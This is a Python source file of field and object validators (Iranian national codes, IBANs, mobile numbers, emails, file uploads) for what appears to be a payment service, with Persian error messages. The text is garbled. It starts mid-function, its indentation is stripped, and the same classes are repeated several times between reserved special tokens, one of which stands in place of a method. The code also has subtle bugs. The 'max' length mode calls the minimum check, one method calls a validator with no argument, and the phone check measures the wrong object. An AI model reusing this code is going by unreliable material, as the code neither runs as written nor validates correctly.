if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_featuresValidator(self, data):
for i in data['value']:
if i not in ['پلتفرم پرداخت در محل', 'باشگاه مشتریان',
'درگاه پرداخت اینترنتی']:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.
value)
break
def _check_with_userNameValidator(self, data):
username = re.match('^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$', data['value'])
if 'admin' in data['value'] or 'zibal' in data['value'
] or username is None:
self.setError(data['field'], enum.Error.INVALID_USERNAME.value)
def _check_with_phoneNumberValidator(self, data):
if data['value'] is None or len(data) < 1:
self.setError(data['field'], enum.Error.
PHONE_INCORRECT_TEMPLATE.value)
def _check_with_mobileValidator(self, data):
mobileNumber = data['value']
if mobileNumber is None:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
return
match_object = re.match('(^09[0-9]{9}$)', mobileNumber)
if match_object is None or mobileNumber is None:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_emailValidator(self, data):
email = data['value']
if email is None:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
return
match_object = re.match(
'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)', email)
if match_object is None or email is None:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_noneValidator(self, data):
if data['value'] is None or data['value'] == '':
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
def _check_with_fileValidator(self, data):
file = data['value']
field = data['field']
if file is None:
self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)
return
elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:
self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)
types = data['options'].get('types', None)
valid = False
if types is not None:
for type in types:
valid = valid or type in file.content_type
if valid is False:
self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)
def _check_with_IBANValidator(self, data):
iban = data['value']
if len(iban) != 26 or not iban.startswith('IR'):
self.setError(data['field'], enum.Error.IBAN_ERROR.value)
return
code = iban[4:] + iban[:4]
code = code.replace('I', '18').replace('R', '27')
if int(code) % 97 != 1:
self.setError(data['field'], enum.Error.IBAN_ERROR.value)
def _check_with_subMerchantBankAccountValidator(self, data):
if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID
=data['value']['subId'], status=1).exists():
self.setError(data['field'], enum.Error.
IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)
def _check_with_minDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) < data['length']:
self.setError(data['field'], (enum.Error.
MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_maxDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) > data['length']:
self.setError(data['field'], (enum.Error.
MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_equalDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) != data['length']:
self.setError(data['field'], (enum.Error.
MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_inputValidator(self, data):
if data['value'] is None or len(data['value']) < 1:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
def _check_with_IbanTransferable(self, data):
if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':
self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value
)
def _check_with_username(self, data):
username = re.match('^[a-zA-Z0-9_.-]+$', data['value'])
if username is None:
self.setError(data['field'], enum.Error.INVALID_USERNAME.value)
def checkType(self, field, type, value='unAssigned'):
self.addValidation({'field': field, 'type': type, 'value': value},
self._check_with_typeValidator)
return self
def checkNationalLegalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_nationalLegalCodeValidator)
return self
def checkOfficer1NationalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_officer1NationalCodeValidator)
return self
def checkOfficer2NationalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_officer2NationalCodeValidator)
return self
def checkNationalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_nationalCodeValidator)
return self
def checkFeatures(self, field, features='unAssigned'):
self.addValidation({'field': field, 'value': features}, self.
_check_with_featuresValidator)
return self
def checkUserName(self, field, username='unAssigned'):
self.addValidation({'field': field, 'value': username}, self.
_check_with_userNameValidator)
return self
def checkPhone(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_phoneNumberValidator)
return self
def checkMobile(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_mobileValidator)
return self
def checkEmail(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_emailValidator)
return self
def checkNotNone(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_noneValidator)
return self
def checkFile(self, field, data, **options):
self.addValidation({'field': field, 'value': data, 'options':
options}, self._check_with_fileValidator)
return self
def checkIBAN(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_IBANValidator)
return self
def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):
data = {'userId': userId, 'subId': subId}
self.addValidation({'field': field, 'value': data}, self.
_check_with_subMerchantBankAccountValidator)
return self
def checkDataLength(self, field, length, mode='equal', data='unAssigned'):
if mode == 'equal':
validatorFunction = self._check_with_equalDataLengthValidator
if mode == 'min':
validatorFunction = self._check_with_minDataLengthValidator
if mode == 'max':
validatorFunction = self._check_with_minDataLengthValidator
self.addValidation({'field': field, 'value': data, 'length': length
}, validatorFunction)
return self
def checkInputData(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_inputValidator)
return self
def checkTelephone(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_phoneNumberValidator)
return self
def checkIsIbanTransferable(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_IbanTransferable)
return self
def checkUsername(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_username())
class DataValidator:
def __init__(self, data={}):
self.fieldValidator = FieldValidator(data)
self.objectValidator = ObjectValidator()
self.errors = {}
self.statusCode = 200
def getValidatorsErrors(self):
self.objectValidator.validate()
self.fieldValidator.validate()
for key in self.fieldValidator.getErrors().keys():
self.errors[key] = self.errors.get(key, []
) + self.fieldValidator.getErrors()[key]
self.statusCode = self.fieldValidator.statusCode
for key in self.objectValidator.getErrors().keys():
self.errors[key] = self.errors.get(key, []
) + self.objectValidator.getErrors()[key]
self.statusCode = (self.objectValidator.statusCode if self.
objectValidator.statusCode != 200 else self.statusCode)
return self.errors
def generateMessage(self):
messages = []
errorKeys = self.errors.keys()
if 'email' in errorKeys:
messages.append(' آدرس ایمیل نامعتبر است')
if 'name' in errorKeys:
messages.append('نام را وارد کنید')
if 'username' in errorKeys:
messages.append('نام کاربری را وارد کنید')
if 'password' in errorKeys:
messages.append('رمز عبور را وارد کنید')
if 'mobile' in errorKeys:
messages.append('تلفن همراه خود را وارد کنید.')
if 'phone' in errorKeys:
messages.append(
'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')
if 'iban' in errorKeys or 'IBAN' in errorKeys:
messages.append(
'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'
)
if 'user' in errorKeys:
messages.append('لطفا وارد شوید')
return messages
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ObjectValidator:
def __init__(self, validationData={}, *args, **kwargs):
self.data = validationData
self.statusCode = 200
self.validationPipeline = []
self.errors = {}
self.invalidFields = []
def flush(self):
self = ObjectValidator()
return self
<|reserved_special_token_0|>
def getErrors(self):
return self.errors
def validate(self):
for validation in self.validationPipeline:
try:
validation['validator'](validation['data'])
except:
self.setError(validation['data']['field'], enum.Error.
INVALID_FIELD_DATA.value)
def addValidation(self, data, validatorFunction):
self.validationPipeline.append({'data': data, 'validator':
validatorFunction})
def _check_with_authenticationValidator(self, data):
if not data['user'].is_authenticated:
self.setError(data['field'], enum.Error.UNAUTHORIZED.value)
def _check_with_nonDuplicateObjectValidator(self, data):
model = data['model']
if model.objects.filter(**data['filter']):
self.setError(data['field'], enum.Error.DUPLICATE_FIELDS.value)
def _check_with_ObjectExistenceValidator(self, data):
model = data['model']
if not model.objects.filter(**data['filter']):
self.setError(data['field'], enum.Error.
GENERIC_OBJECT_NOT_FOUND.value)
def checkNonDuplicateObject(self, field, model, **filter):
self.addValidation({'field': field, 'model': model, 'filter':
filter}, self._check_with_nonDuplicateObjectValidator)
return self
def checkObjectExistence(self, field, model, **filter):
self.addValidation({'field': field, 'model': model, 'filter':
filter}, self._check_with_ObjectExistenceValidator)
return self
def checkUserAuthentication(self, field, user):
self.addValidation({'field': field, 'user': user}, self.
_check_with_authenticationValidator)
return self
class FieldValidator:
def __init__(self, validationData={}, *args, **kwargs):
self.data = validationData
self.validationPipeline = []
self.statusCode = 200
self.errors = {}
self.invalidFields = []
def flush(self):
self = FieldValidator()
def setError(self, field, error):
if field not in self.invalidFields:
fieldErrors = self.errors.get(field, [])
if error[0] not in fieldErrors:
self.errors[field] = fieldErrors + [error[0]]
self.statusCode = error[1]
self.invalidFields.append(field)
def getErrors(self):
return self.errors
def validate(self):
for validation in self.validationPipeline:
try:
validation['validator'](validation['data'])
except:
self.setError(validation['data']['field'], enum.Error.
INVALID_FIELD_DATA.value)
return self
def addValidation(self, data, validatorFunction):
if data['value'] == 'unAssigned' and data['field'] in self.data.keys():
data['value'] = self.data[data['field']]
elif data['value'] == 'unAssigned' and data['field'
] not in self.data.keys():
data['value'] = None
self.validationPipeline.append({'data': data, 'validator':
validatorFunction})
def _check_with_typeValidator(self, data):
if not isinstance(data['value'], data['type']):
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_nationalLegalCodeValidator(self, data):
nationalLegalCode = data['value']
result = 0
validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]
if len(nationalLegalCode) != 11:
self.setError(data['field'], enum.Error.
INVALID_NATIONAL_LEGAL_CODE.value)
return
for i in range(10):
result += (int(nationalLegalCode[-2]) + 2 + int(
nationalLegalCode[i])) * validationList[i]
if result % 11 == 10:
reminder = 0
else:
reminder = result % 11
if reminder == int(nationalLegalCode[-1]):
valid = True
else:
valid = False
if valid is False:
self.setError(data['field'], enum.Error.
INVALID_NATIONAL_LEGAL_CODE.value)
def _check_with_nationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
valid = False
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_officer1NationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_officer2NationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
valid = False
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_featuresValidator(self, data):
for i in data['value']:
if i not in ['پلتفرم پرداخت در محل', 'باشگاه مشتریان',
'درگاه پرداخت اینترنتی']:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.
value)
break
def _check_with_userNameValidator(self, data):
username = re.match('^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$', data['value'])
if 'admin' in data['value'] or 'zibal' in data['value'
] or username is None:
self.setError(data['field'], enum.Error.INVALID_USERNAME.value)
def _check_with_phoneNumberValidator(self, data):
if data['value'] is None or len(data) < 1:
self.setError(data['field'], enum.Error.
PHONE_INCORRECT_TEMPLATE.value)
def _check_with_mobileValidator(self, data):
mobileNumber = data['value']
if mobileNumber is None:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
return
match_object = re.match('(^09[0-9]{9}$)', mobileNumber)
if match_object is None or mobileNumber is None:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_emailValidator(self, data):
email = data['value']
if email is None:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
return
match_object = re.match(
'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)', email)
if match_object is None or email is None:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_noneValidator(self, data):
if data['value'] is None or data['value'] == '':
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
def _check_with_fileValidator(self, data):
file = data['value']
field = data['field']
if file is None:
self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)
return
elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:
self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)
types = data['options'].get('types', None)
valid = False
if types is not None:
for type in types:
valid = valid or type in file.content_type
if valid is False:
self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)
def _check_with_IBANValidator(self, data):
iban = data['value']
if len(iban) != 26 or not iban.startswith('IR'):
self.setError(data['field'], enum.Error.IBAN_ERROR.value)
return
code = iban[4:] + iban[:4]
code = code.replace('I', '18').replace('R', '27')
if int(code) % 97 != 1:
self.setError(data['field'], enum.Error.IBAN_ERROR.value)
def _check_with_subMerchantBankAccountValidator(self, data):
if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID
=data['value']['subId'], status=1).exists():
self.setError(data['field'], enum.Error.
IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)
def _check_with_minDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) < data['length']:
self.setError(data['field'], (enum.Error.
MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_maxDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) > data['length']:
self.setError(data['field'], (enum.Error.
MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_equalDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) != data['length']:
self.setError(data['field'], (enum.Error.
MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_inputValidator(self, data):
if data['value'] is None or len(data['value']) < 1:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
def _check_with_IbanTransferable(self, data):
if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':
self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value
)
def _check_with_username(self, data):
username = re.match('^[a-zA-Z0-9_.-]+$', data['value'])
if username is None:
self.setError(data['field'], enum.Error.INVALID_USERNAME.value)
def checkType(self, field, type, value='unAssigned'):
self.addValidation({'field': field, 'type': type, 'value': value},
self._check_with_typeValidator)
return self
def checkNationalLegalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_nationalLegalCodeValidator)
return self
def checkOfficer1NationalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_officer1NationalCodeValidator)
return self
def checkOfficer2NationalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_officer2NationalCodeValidator)
return self
def checkNationalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_nationalCodeValidator)
return self
def checkFeatures(self, field, features='unAssigned'):
self.addValidation({'field': field, 'value': features}, self.
_check_with_featuresValidator)
return self
def checkUserName(self, field, username='unAssigned'):
self.addValidation({'field': field, 'value': username}, self.
_check_with_userNameValidator)
return self
def checkPhone(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_phoneNumberValidator)
return self
def checkMobile(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_mobileValidator)
return self
def checkEmail(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_emailValidator)
return self
def checkNotNone(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_noneValidator)
return self
def checkFile(self, field, data, **options):
self.addValidation({'field': field, 'value': data, 'options':
options}, self._check_with_fileValidator)
return self
def checkIBAN(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_IBANValidator)
return self
def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):
data = {'userId': userId, 'subId': subId}
self.addValidation({'field': field, 'value': data}, self.
_check_with_subMerchantBankAccountValidator)
return self
def checkDataLength(self, field, length, mode='equal', data='unAssigned'):
if mode == 'equal':
validatorFunction = self._check_with_equalDataLengthValidator
if mode == 'min':
validatorFunction = self._check_with_minDataLengthValidator
if mode == 'max':
validatorFunction = self._check_with_minDataLengthValidator
self.addValidation({'field': field, 'value': data, 'length': length
}, validatorFunction)
return self
def checkInputData(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_inputValidator)
return self
def checkTelephone(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_phoneNumberValidator)
return self
def checkIsIbanTransferable(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_IbanTransferable)
return self
def checkUsername(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_username())
class DataValidator:
def __init__(self, data={}):
self.fieldValidator = FieldValidator(data)
self.objectValidator = ObjectValidator()
self.errors = {}
self.statusCode = 200
def getValidatorsErrors(self):
self.objectValidator.validate()
self.fieldValidator.validate()
for key in self.fieldValidator.getErrors().keys():
self.errors[key] = self.errors.get(key, []
) + self.fieldValidator.getErrors()[key]
self.statusCode = self.fieldValidator.statusCode
for key in self.objectValidator.getErrors().keys():
self.errors[key] = self.errors.get(key, []
) + self.objectValidator.getErrors()[key]
self.statusCode = (self.objectValidator.statusCode if self.
objectValidator.statusCode != 200 else self.statusCode)
return self.errors
def generateMessage(self):
messages = []
errorKeys = self.errors.keys()
if 'email' in errorKeys:
messages.append(' آدرس ایمیل نامعتبر است')
if 'name' in errorKeys:
messages.append('نام را وارد کنید')
if 'username' in errorKeys:
messages.append('نام کاربری را وارد کنید')
if 'password' in errorKeys:
messages.append('رمز عبور را وارد کنید')
if 'mobile' in errorKeys:
messages.append('تلفن همراه خود را وارد کنید.')
if 'phone' in errorKeys:
messages.append(
'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')
if 'iban' in errorKeys or 'IBAN' in errorKeys:
messages.append(
'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'
)
if 'user' in errorKeys:
messages.append('لطفا وارد شوید')
return messages
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ObjectValidator:
def __init__(self, validationData={}, *args, **kwargs):
self.data = validationData
self.statusCode = 200
self.validationPipeline = []
self.errors = {}
self.invalidFields = []
def flush(self):
self = ObjectValidator()
return self
def setError(self, field, error):
if field not in self.invalidFields:
fieldErrors = self.errors.get(field, [])
if error[0] not in fieldErrors:
self.errors[field] = fieldErrors + [error[0]]
self.statusCode = error[1]
self.invalidFields.append(field)
def getErrors(self):
return self.errors
def validate(self):
for validation in self.validationPipeline:
try:
validation['validator'](validation['data'])
except:
self.setError(validation['data']['field'], enum.Error.
INVALID_FIELD_DATA.value)
def addValidation(self, data, validatorFunction):
self.validationPipeline.append({'data': data, 'validator':
validatorFunction})
def _check_with_authenticationValidator(self, data):
if not data['user'].is_authenticated:
self.setError(data['field'], enum.Error.UNAUTHORIZED.value)
def _check_with_nonDuplicateObjectValidator(self, data):
model = data['model']
if model.objects.filter(**data['filter']):
self.setError(data['field'], enum.Error.DUPLICATE_FIELDS.value)
def _check_with_ObjectExistenceValidator(self, data):
model = data['model']
if not model.objects.filter(**data['filter']):
self.setError(data['field'], enum.Error.
GENERIC_OBJECT_NOT_FOUND.value)
def checkNonDuplicateObject(self, field, model, **filter):
self.addValidation({'field': field, 'model': model, 'filter':
filter}, self._check_with_nonDuplicateObjectValidator)
return self
def checkObjectExistence(self, field, model, **filter):
self.addValidation({'field': field, 'model': model, 'filter':
filter}, self._check_with_ObjectExistenceValidator)
return self
def checkUserAuthentication(self, field, user):
self.addValidation({'field': field, 'user': user}, self.
_check_with_authenticationValidator)
return self
class FieldValidator:
def __init__(self, validationData={}, *args, **kwargs):
self.data = validationData
self.validationPipeline = []
self.statusCode = 200
self.errors = {}
self.invalidFields = []
def flush(self):
self = FieldValidator()
def setError(self, field, error):
if field not in self.invalidFields:
fieldErrors = self.errors.get(field, [])
if error[0] not in fieldErrors:
self.errors[field] = fieldErrors + [error[0]]
self.statusCode = error[1]
self.invalidFields.append(field)
def getErrors(self):
return self.errors
def validate(self):
for validation in self.validationPipeline:
try:
validation['validator'](validation['data'])
except:
self.setError(validation['data']['field'], enum.Error.
INVALID_FIELD_DATA.value)
return self
def addValidation(self, data, validatorFunction):
if data['value'] == 'unAssigned' and data['field'] in self.data.keys():
data['value'] = self.data[data['field']]
elif data['value'] == 'unAssigned' and data['field'
] not in self.data.keys():
data['value'] = None
self.validationPipeline.append({'data': data, 'validator':
validatorFunction})
def _check_with_typeValidator(self, data):
if not isinstance(data['value'], data['type']):
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_nationalLegalCodeValidator(self, data):
nationalLegalCode = data['value']
result = 0
validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]
if len(nationalLegalCode) != 11:
self.setError(data['field'], enum.Error.
INVALID_NATIONAL_LEGAL_CODE.value)
return
for i in range(10):
result += (int(nationalLegalCode[-2]) + 2 + int(
nationalLegalCode[i])) * validationList[i]
if result % 11 == 10:
reminder = 0
else:
reminder = result % 11
if reminder == int(nationalLegalCode[-1]):
valid = True
else:
valid = False
if valid is False:
self.setError(data['field'], enum.Error.
INVALID_NATIONAL_LEGAL_CODE.value)
def _check_with_nationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
valid = False
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_officer1NationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_officer2NationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
valid = False
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_featuresValidator(self, data):
for i in data['value']:
if i not in ['پلتفرم پرداخت در محل', 'باشگاه مشتریان',
'درگاه پرداخت اینترنتی']:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.
value)
break
def _check_with_userNameValidator(self, data):
username = re.match('^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$', data['value'])
if 'admin' in data['value'] or 'zibal' in data['value'
] or username is None:
self.setError(data['field'], enum.Error.INVALID_USERNAME.value)
def _check_with_phoneNumberValidator(self, data):
if data['value'] is None or len(data) < 1:
self.setError(data['field'], enum.Error.
PHONE_INCORRECT_TEMPLATE.value)
def _check_with_mobileValidator(self, data):
mobileNumber = data['value']
if mobileNumber is None:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
return
match_object = re.match('(^09[0-9]{9}$)', mobileNumber)
if match_object is None or mobileNumber is None:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_emailValidator(self, data):
email = data['value']
if email is None:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
return
match_object = re.match(
'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)', email)
if match_object is None or email is None:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_noneValidator(self, data):
if data['value'] is None or data['value'] == '':
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
def _check_with_fileValidator(self, data):
file = data['value']
field = data['field']
if file is None:
self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)
return
elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:
self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)
types = data['options'].get('types', None)
valid = False
if types is not None:
for type in types:
valid = valid or type in file.content_type
if valid is False:
self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)
def _check_with_IBANValidator(self, data):
iban = data['value']
if len(iban) != 26 or not iban.startswith('IR'):
self.setError(data['field'], enum.Error.IBAN_ERROR.value)
return
code = iban[4:] + iban[:4]
code = code.replace('I', '18').replace('R', '27')
if int(code) % 97 != 1:
self.setError(data['field'], enum.Error.IBAN_ERROR.value)
def _check_with_subMerchantBankAccountValidator(self, data):
if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID
=data['value']['subId'], status=1).exists():
self.setError(data['field'], enum.Error.
IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)
def _check_with_minDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) < data['length']:
self.setError(data['field'], (enum.Error.
MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_maxDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) > data['length']:
self.setError(data['field'], (enum.Error.
MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_equalDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) != data['length']:
self.setError(data['field'], (enum.Error.
MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_inputValidator(self, data):
if data['value'] is None or len(data['value']) < 1:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
def _check_with_IbanTransferable(self, data):
if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':
self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value
)
def _check_with_username(self, data):
username = re.match('^[a-zA-Z0-9_.-]+$', data['value'])
if username is None:
self.setError(data['field'], enum.Error.INVALID_USERNAME.value)
def checkType(self, field, type, value='unAssigned'):
self.addValidation({'field': field, 'type': type, 'value': value},
self._check_with_typeValidator)
return self
def checkNationalLegalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_nationalLegalCodeValidator)
return self
def checkOfficer1NationalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_officer1NationalCodeValidator)
return self
def checkOfficer2NationalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_officer2NationalCodeValidator)
return self
def checkNationalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_nationalCodeValidator)
return self
def checkFeatures(self, field, features='unAssigned'):
self.addValidation({'field': field, 'value': features}, self.
_check_with_featuresValidator)
return self
def checkUserName(self, field, username='unAssigned'):
self.addValidation({'field': field, 'value': username}, self.
_check_with_userNameValidator)
return self
def checkPhone(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_phoneNumberValidator)
return self
def checkMobile(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_mobileValidator)
return self
def checkEmail(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_emailValidator)
return self
def checkNotNone(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_noneValidator)
return self
def checkFile(self, field, data, **options):
self.addValidation({'field': field, 'value': data, 'options':
options}, self._check_with_fileValidator)
return self
def checkIBAN(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_IBANValidator)
return self
